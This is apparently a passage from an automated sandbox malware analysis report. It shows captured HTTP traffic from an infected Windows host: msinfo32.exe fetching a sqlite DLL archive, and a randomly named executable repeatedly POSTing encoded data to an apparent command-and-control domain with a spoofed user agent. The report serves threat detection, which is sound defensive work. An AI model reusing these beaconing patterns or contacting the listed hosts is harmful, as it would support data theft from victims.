                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                                          Oct 22, 2024 15:01:34.726486921 CEST303INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Tue, 22 Oct 2024 13:01:34 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 153
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.224916445.33.6.223803676C:\Windows\SysWOW64\msinfo32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:38.834542036 CEST232OUTGET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Host: www.sqlite.org
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Oct 22, 2024 15:01:39.430274010 CEST1236INHTTP/1.1 200 OK
                                                                          Connection: keep-alive
                                                                          Date: Tue, 22 Oct 2024 13:01:39 GMT
                                                                          Last-Modified: Sat, 12 Mar 2022 13:56:34 GMT
                                                                          Cache-Control: max-age=120
                                                                          ETag: "m622ca692s8a577"
                                                                          Content-type: application/zip; charset=utf-8
                                                                          Content-length: 566647
                                                                          Data Raw: 50 4b 03 04 14 00 00 00 08 00 a6 12 57 54 f6 08 b2 ad 9e 06 00 00 c6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a8 37 15 62 a8 37 15 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5 5c f9 01 af 93 4a b2 c8 4e 85 24 24 e1 8b 40 66 b8 83 bf 3e cd 70 45 37 20 67 f5 1e a7 2f d0 b4 7a 82 6f ff fe f9 c7 5f ff fc fd c9 fe 90 c2 f1 8f 81 ad ab e1 2b 73 7c 98 b4 72 fc e9 ba 12 af 10 f7 4e 0f f0 43 ae ac d0 8a e0 3b 9b bc df 87 83 ad dc 9e 82 91 4d 37 7f 0c 8b 50 c2 6e 35 05 e8 6a 16 a6 d3 2d b3 c0 f0 9d c1 04 b5 d6 02 eb f8 51 98 50 f3 30 4a 3d b6 e4 eb 6f 94 cd da 8f 92 53 26 f0 be 19 d4 f3 94 97 92 92 83 19 b6 73 c7 4d 65 ac 4a 08 23 fe bc 12 2a f8 5b c9 34 6c ce 0d 85 e4 23 9d e4 f3 d7 96 d5 6a df 99 f4 d5 0e 3f b9 d1 ad ad de 14 2f 00 c3 61 7c 39 fc 61 03 9a a4 b6 9c 22 7d 70 45 89 e1 6c ae 49 fb ab 87 81 ff 0b f2 f6 35 6c 4c cd 12 1b 20 40 27 76 ae 7d b1 c1 c4 d4 c4 e5 85 5f 4e b0 c4 ca 57 a3 c1 4d d8 3c 5f 60 f0 20 b3 f7 64 33 97 bc 28 85 [TRUNCATED]
                                                                          Data Ascii: PKWTsqlite3.defUT7b7bux&@\JN$$@f>pE7 g/zo_+s|rNC;M7Pn5j-QP0J=oS&sMeJ#*[4l#j?/a|9a"}pElI5lL @'v}_NWM<_` d3(%?z;n4$p7Q_%!L]ISg>'Hn4JsY/5s-;n-tB$}998BAdBNg>_PoFbv>}$3{;3hJTjaOfU' Q;+(,c-'7!!'GXxKi?pv<J-b09jd+$[@wjzy[dohhhU8c!(=;/4#Nl"=jF@vPw2U);AV%wkC$/"(3`8A0}dkni6nPdLz&}_zY,r{'48t/Au?jy^9cOhI`z(A b8iLM'ZCVJ$~&Ca?;jC1Hn}[KI)9d66F?DR(&Q2;w&!:}A$5=da^K[lCDd<#${
                                                                          Oct 22, 2024 15:01:39.430650949 CEST1236INData Raw: 90 c6 3f 0c 50 2c 86 21 ce 98 da 82 1e 33 1e 92 0b 63 70 a1 68 e4 26 97 1e 86 c3 c5 8a d7 63 b4 d5 49 f0 7e 08 7e d4 b0 f3 bb ea 57 fe 98 43 7e 0f 5d 14 bd cb 14 19 75 c5 c2 67 7e b8 ad c3 49 95 2e 18 35 b9 88 a2 7e 16 a8 0e b1 8c c7 70 9d b7 b6
                                                                          Data Ascii: ?P,!3cph&cI~~WC~]ug~I.5~pR] N"[;XjJ/So)/J8st?RK\PeZ0H 8}zDu<p/[P:y~P>mXNdJe/B4j%l`gHL,UM
                                                                          Oct 22, 2024 15:01:39.430664062 CEST1236INData Raw: 28 34 0f be 67 c1 ef bc 9b e0 9c 0f 3c 57 52 82 cf 49 66 f8 f3 ae e5 96 75 f3 21 be 17 34 7c ac 8f a0 af 0c 73 b1 12 e3 e1 9d 86 14 e7 03 2f e9 e5 e2 27 e8 4b c3 44 f8 fd f0 26 b8 da 07 5c 4b 97 e1 33 a2 31 f4 5a d8 d8 19 6a 6e 01 27 be cc ea 97
                                                                          Data Ascii: (4g<WRIfu!4|s/'KD&\K31Zjn'R&hpndw(3;w{n?@60t.;VwF8gwkp5;s!s6n.a#>{~Gjwvh{'xF87O_|Z<x8
                                                                          Oct 22, 2024 15:01:39.431730032 CEST1236INData Raw: 86 3a 2d ef e3 b3 3a 03 7a 65 2a 5d 68 a9 6c 11 27 3a 9a 45 9e 1c 50 2f c3 47 92 69 29 6c 78 af 4a 9b 4f b0 aa 4d 85 c1 2e 48 f8 f1 0d 09 f0 4c dd e6 42 ea 1c 08 3d ca b5 51 72 d7 40 83 ef b1 c4 6c 9c e2 93 c6 3a 7c ea 8b 90 12 ea 73 00 05 24 51
                                                                          Data Ascii: :-:ze*]hl':EP/Gi)lxJOM.HLB=Qr@l:|s$Q_IoN!^{Cbs\{-+r1+RWfhXwT^koc2yNK-+[]#9Y>3@BMM/IK1LIt|#o6N>B+<Bjs]qZO_$fLy;
                                                                          Oct 22, 2024 15:01:39.431746006 CEST1236INData Raw: 06 fb 1b 51 1a ab ca 6d 97 a6 43 93 ea d4 c9 3b 22 a0 c6 50 56 f4 21 f2 60 e0 63 e4 d3 72 7b 20 6b 04 60 8e 2d ec c1 92 06 b1 a4 99 db 2f 31 44 90 21 b2 ee 52 14 e4 89 be 0c 05 fd 48 2b 08 92 26 46 8f 68 b8 a5 db b5 32 59 86 de 3a 35 16 90 03 f8
                                                                          Data Ascii: QmC;"PV!`cr{ k`-/1D!RH+&Fh2Y:5VN=<hLbPc;g>DsGu<0l!z=K#qm\(}8n8s> l>wH]8v9,08[#RWThTN:D:`
                                                                          Oct 22, 2024 15:01:39.433033943 CEST1236INData Raw: 25 13 79 15 7a 3b 01 75 4c a4 24 51 85 57 1e 92 2b fb e0 75 4d 82 1a 53 d9 49 66 48 7c 63 c6 1d 46 df 79 a3 f8 10 9d d4 e4 64 87 58 95 6d 24 2f 01 60 32 13 d5 09 be 4d 09 06 92 c1 8b 08 c6 c9 9b cc b0 26 a5 e8 3e 67 bc 19 90 67 98 91 64 d2 3c 8b
                                                                          Data Ascii: %yz;uL$QW+uMSIfH|cFydXm$/`2M&>ggd<osAC#(j\F>`B~S(=5\Hs #fGl E\70~,4`:<1Mt4ci,Opb7K@=acr b/#8-tJ04
                                                                          Oct 22, 2024 15:01:39.433048010 CEST1236INData Raw: 71 84 8b e8 c7 d8 d3 f4 53 36 0c bd 26 77 17 19 9a e2 e9 c6 19 88 b3 51 ae 0d a2 28 ae f3 9d 0b ff 1a 63 c0 39 a8 4e 4c 93 df 45 f1 27 92 b0 5f 9a 7b 8c 70 a8 e0 4d d7 26 26 ec 89 17 cb 66 e0 cc 94 a6 d0 2a ac 1c ea d8 7c 9b a0 29 a6 aa 3c 5e a8
                                                                          Data Ascii: qS6&wQ(c9NLE'_{pM&&f*|)<^qa6L7_18N*,b)-;Ostb4q#fVsA!o*gP*z^K4otj_3}}UOcS"{)jdvHLGSKWe({)
                                                                          Oct 22, 2024 15:01:39.434348106 CEST1236INData Raw: 4b 8a 2b 5b 24 60 25 6a 50 41 a7 61 a3 71 30 fa c4 4c 6c 55 e4 f0 91 6f c4 69 fe d4 5d 7e 4b 15 9d 45 27 39 8e 6e 34 93 69 64 06 19 54 bb 47 07 94 b1 46 09 63 8f 89 a8 d5 60 ba 7e dc c1 ad a7 dd e6 8e 88 b9 55 3d 45 67 03 25 0f 77 44 a4 c0 53 47
                                                                          Data Ascii: K+[$`%jPAaq0LlUoi]~KE'9n4idTGFc`~U=Eg%wDSGd:#=RL;^~*FnWqg<P4O&_g(/]Bf|zsm5t}lt}O``pC<mb~fcf)\fN4
                                                                          Oct 22, 2024 15:01:39.434360981 CEST1236INData Raw: 97 31 71 ad 98 54 4c 73 ee 84 cd 90 d4 17 cb 83 4f 94 3f 8c ba 8e be ba 04 ec ba b7 ea 8f 76 1d 3d af 09 a3 6a bc 3c f4 c4 ee 27 90 8e 3d 75 60 3c cc f9 a3 9a 09 0f 0c 47 6c 9f 33 c2 8a 4b cb a2 5e 0e a5 25 d0 3c be bf de 60 e5 0d e2 d4 ed e7 d1
                                                                          Data Ascii: 1qTLsO?v=j<'=u`<Gl3K^%<`YD=5.sxwHo0;3m7XT3P6QN:4wypk[N;fx'k+.QLZA]'\sw)=)aO)/*UtUI#/NS}cm
                                                                          Oct 22, 2024 15:01:39.434371948 CEST709INData Raw: 4f e1 83 56 5f dd 6a 25 10 71 96 1d ff 6a e4 b1 98 e6 4d 84 1d b5 d1 28 c6 51 83 6f 9e 41 34 39 d5 01 df 79 5e 8c 74 c2 9b 3a e0 0c 37 cf 93 0f 06 41 66 81 e5 93 45 73 6c e4 84 7f 45 90 9c a9 bb c4 9b d6 5b 2b 3b cb 52 c8 d6 44 1e 38 22 98 1f 9b
                                                                          Data Ascii: OV_j%qjM(QoA49y^t:7AfEslE[+;RD8"YYSDd9-=rU|%i_1f<_YZza{JaYGf=k\6KNW*WK=ZGn<;b5hW3u]F{}*3eH#HT9pxN8R "]
                                                                          Oct 22, 2024 15:01:39.436089993 CEST1236INData Raw: 67 86 fa db 9b 0d d4 76 19 f5 93 01 bc 95 a0 94 1c 09 b2 f3 98 06 e5 1d 78 7a 2f ef dd 9e 22 7f 5e f0 bd 65 68 cb 74 dc 6f 79 03 96 cc 3d 50 59 39 c0 53 af d9 b1 89 87 bd 89 df 41 bd dd e4 61 04 65 4b 8b 44 a9 11 0b d5 e3 f6 3e 3c 50 db 72 04 29
                                                                          Data Ascii: gvxz/"^ehtoy=PY9SAaeKD><Pr)Qmxx2sd5"0nAy5F{&U6@c"#Bw</2Qc'd&}-a]_0j-%L<Ur_[x\U_#MQ(7Vn


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.2249165185.196.10.234801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:50.077229977 CEST2472OUTPOST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d [TRUNCATED]
                                                                          Data Ascii: 2PV85pl=UUdA9WufenFARWXm7A8Jifw91O00dfzwo8mlqhPnsMSCdH+P8dCT7TC7oUW0G9cf/OlYMmX7aNDvNS4JhzInmFriFhMlU5am73/RbVZPfAQ02afP5L0RbhoedVi7hYf/BxdU4H+aou3uV4ofXqUpU0hQbdhJys1CZu6Tx0Gf0Tw1OOBBjlZ8d6T1laoxN+bbePL4OKo9Yuc02ZXJgj5uyEJdzA7k13Gssuwx8HGlmJxNyUCQwYAxNloB3xYj+1LJm7fxvmc+I2WDLbqMqxAOBwA/HjL5cjx1d9zVQqPAc4vAzcQWe+hxuacpSb0yNCr4uU6qr8SeamyEOkst0MvB+acwDAY4DmQ8FQ5Cm+KE3nAMRO0yj3LSa+rEF4dwTFFDpGv+6fhGCWcJzYBrUZN3VACA5RDDskyZHk9tBQCMqwz2m+cvcLFq4k4E6jrqBDwvy1cm3jZg6PdnxlW5DlK94yqLaZOG4dHidq3LeqPCgV0IrXgDNw5sfKj/nc81bRNSyUdPv/8O5xXLiQTHav1XRJSL8EohHSTBYlArx6E7Hyl118C8np10U8a2g22S9lkZ5SpW+0AeLD8ydojFWZb8DSGo0zvzUSNP3DtCZA3tmhE2mESBrUsNzNVYUgRLAVCbb3na+1o7IWF7Qtyi4tL3RMaMbSJLfAa9MHrUTUKTbqhG8c7dc9jSpcWb7PU7gZKCYiGi67K7OGCU0nW+VuD1b58XrT7ut+XjnkEauHPV2pPMUX9oGIr/ydU5YSMrD2/uhaoRVMPyhETtqAWcv/9HYtFNQ51WsDjflrQWPj1sEg5HcUvov862HHNRhgli+KAMt4AHzNp+NU5Q3qmjlJc4DdCWCHIiUSsM67dPcC7Gb8CPRCYETOBnGlMF0189znyDbIPZ1ghLyqrtR/sG6FF0ChuioFu4smsxOjTnF0aICUkqyfiip2YsQAZYn1fV3bofoQX1KJA1xs6XsQC/n3MbAKYBEr4PjPV0nlhgxY8q+wz/ [TRUNCATED]
                                                                          Oct 22, 2024 15:01:50.082779884 CEST166OUTData Raw: 76 43 46 64 78 71 55 35 41 53 54 48 79 59 59 52 34 36 2f 52 48 36 70 61 5a 65 6c 4c 56 76 46 37 2b 4c 67 6a 32 54 41 77 2f 30 4a 56 4b 74 51 48 75 61 34 4a 62 31 6a 7a 50 4c 39 46 65 31 36 4f 4c 2b 48 5a 4b 52 5a 55 46 4e 2b 6f 64 46 4d 6a 4d 46
                                                                          Data Ascii: vCFdxqU5ASTHyYYR46/RH6paZelLVvF7+Lgj2TAw/0JVKtQHua4Jb1jzPL9Fe16OL+HZKRZUFN+odFMjMFZ0tCVF9LxYDxnJxgC+8WI06Oi5F590126ILpdC9M/oey/6UjezPBgQg+I6JzZQkUevQ3OeFuZDVdPsr1g1zb
                                                                          Oct 22, 2024 15:01:51.069818020 CEST325INHTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
                                                                          Oct 22, 2024 15:01:51.445035934 CEST325INHTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.2249166185.196.10.234801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:52.618303061 CEST677OUTPOST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 58 58 6d 36 56 49 4a 69 2f 77 39 67 4f 30 30 45 50 7a 4d 6f 38 69 58 71 6b 33 4e 74 2f 43 43 64 57 4f 50 38 76 61 54 33 7a 43 38 38 6b 57 6f 4d 64 64 66 2f 4f 6b 33 4d 6c 50 37 61 4e 58 76 4d 77 77 4a 6a 79 49 67 70 56 72 6b 52 52 4d 6d 55 35 65 56 37 33 44 37 62 57 5a 50 66 42 63 30 33 61 50 50 2f 74 59 52 65 52 70 56 4e 56 69 73 68 59 53 6c 42 77 74 4d 34 43 69 61 6f 66 72 75 57 70 49 66 53 35 38 70 44 6b 68 52 45 39 67 41 79 76 59 64 65 66 6d 74 37 33 4f 62 37 68 6f 58 45 70 39 6a 75 6c 6c 73 57 61 76 55 73 76 49 75 59 2f 32 46 43 51 3d 3d
                                                                          Data Ascii: 2PV85pl=UUdA9WufenFARXXm6VIJi/w9gO00EPzMo8iXqk3Nt/CCdWOP8vaT3zC88kWoMddf/Ok3MlP7aNXvMwwJjyIgpVrkRRMmU5eV73D7bWZPfBc03aPP/tYReRpVNVishYSlBwtM4CiaofruWpIfS58pDkhRE9gAyvYdefmt73Ob7hoXEp9jullsWavUsvIuY/2FCQ==
                                                                          Oct 22, 2024 15:01:53.641880035 CEST325INHTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:53 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.2249167185.196.10.234801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:55.163276911 CEST2472OUTPOST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 51 30 66 6d 34 79 55 4a 6c 66 77 2b 76 75 30 30 64 66 7a 32 6f 38 6d 58 71 68 50 6e 73 4e 75 43 64 42 71 50 38 4e 43 54 36 54 43 38 72 55 57 30 47 39 63 65 2f 4f 78 49 4d 6d 62 4e 61 4a 7a 76 4e 54 34 4a 68 77 51 6e 78 31 72 69 48 68 4d 6e 55 35 65 41 37 33 54 2f 62 57 4d 61 66 46 49 30 32 6f 6e 50 7a 4e 59 53 41 42 70 56 4e 56 69 67 68 59 54 47 42 77 6c 69 34 47 71 4b 6f 70 48 75 57 49 6f 66 52 61 55 71 4c 45 68 56 66 64 68 4c 79 73 35 56 5a 75 36 58 78 30 53 31 30 54 38 31 49 62 64 42 6a 6d 42 7a 53 4b 54 32 71 36 6f 78 53 75 62 64 65 50 4c 6b 4f 4b 6f 39 59 74 49 30 33 4a 58 4a 67 68 42 68 2f 6b 4a 64 76 51 37 6c 78 33 4b 53 73 75 6b 54 38 48 57 66 6d 61 64 4e 78 52 75 51 68 59 41 78 4c 56 6f 48 33 78 59 36 6f 46 4c 76 6d 37 57 62 76 6c 6b 55 49 32 57 44 4c 5a 53 4d 76 6e 30 4f 51 67 41 2f 59 7a 4b 65 56 44 78 79 64 39 48 33 51 75 48 41 63 35 33 41 79 75 34 57 63 37 39 77 68 4b 63 6f 57 62 30 38 41 69 71 6c 75 55 6e 2f 72 38 61 6b 61 6e [TRUNCATED]
                                                                          Data Ascii: 2PV85pl=UUdA9WufenFAQ0fm4yUJlfw+vu00dfz2o8mXqhPnsNuCdBqP8NCT6TC8rUW0G9ce/OxIMmbNaJzvNT4JhwQnx1riHhMnU5eA73T/bWMafFI02onPzNYSABpVNVighYTGBwli4GqKopHuWIofRaUqLEhVfdhLys5VZu6Xx0S10T81IbdBjmBzSKT2q6oxSubdePLkOKo9YtI03JXJghBh/kJdvQ7lx3KSsukT8HWfmadNxRuQhYAxLVoH3xY6oFLvm7WbvlkUI2WDLZSMvn0OQgA/YzKeVDxyd9H3QuHAc53Ayu4Wc79whKcoWb08AiqluUn/r8akanCEOnEtypbB/qc3KgY8Q2cwFQwhm/++3l0MQdsyg1jRYOqPA4dEXFFppGaf6eBGCjkJyZhrfOR2TwDpzxDUlEyFHlc4BRS6qFf2nOcvapcYwU4B9jrGIjxwy1dd3gdw68Bnxlm5D3i94yqMfZOEhNKBdq6jeunSgTIIqGQDNx5sXKj/zM8yVBNUyUJ5v6I0+BTLnG3HctNXE5SJ+EogDST2Ylwrx7QrHxV11dC8mMB0ccb/mG2R9lkC5StK+3oRLFEyds3FUYb8KyGp2zu6QSNG3DkZZCvXmkg2mnqBolsNxtVWIQRLO1CDb2PK+0FOIXN7QYeivdLocsaPdSJMIQaWMHbUTUGTbphG8vDdN+LS18WZk/Vu5pGYYiWU66f+OEGU12W+Wsr6Vp8VuT7gp+XLnkEsuGWI2YvMRTpoBrz89dVQBCN9OW/Oha4rVJ+phT7tqDOcsJpHY9FNQ51ZsDjElrUFPnwHEg5HdFvovKu2TXNU+wll6KAst4E1zJFQNVVQ4bGjlJcnHtCVMnIlUSgr67d1cC3GbJaPL3MEStpnCFMF118+5HyAbIOc1h8QyvftQMUG5G91Ehu/uFuU52QUOjegFxCICjEqyNGiqGYsZAZf+FfA47kboQLfKIRwxZeXvHO/l0UaPaYAb74NjPYAnlZoxcw6+x7/ [TRUNCATED]
                                                                          Oct 22, 2024 15:01:55.168843985 CEST1630OUTData Raw: 69 2f 46 76 35 71 46 66 45 53 42 46 71 59 50 78 34 37 32 78 48 7a 70 61 56 32 6c 4c 46 5a 46 2b 6a 51 67 58 47 54 41 41 2f 30 4e 58 69 75 44 58 75 63 2f 4a 62 43 6a 7a 50 7a 39 46 57 78 36 4f 6e 75 48 59 69 52 5a 57 74 4e 73 49 64 47 45 7a 4d 44
                                                                          Data Ascii: i/Fv5qFfESBFqYPx472xHzpaV2lLFZF+jQgXGTAA/0NXiuDXuc/JbCjzPz9FWx6OnuHYiRZWtNsIdGEzMDY0tiVFwnxY6gnJhgC70WJUqO2pF5hE13mYLwAyhP/oKtnuYseFzAnhUbTbBrV2UwAtQqMa5VWRxjermivi3SUu+Uj3o1J9MDH9ty28qqqpG3o4bOiVPHiHNZm9LMT2AJPuCEMiavDkiCIsxl9RqISz2ksqT61t6hk
                                                                          Oct 22, 2024 15:01:56.213905096 CEST325INHTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:56 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
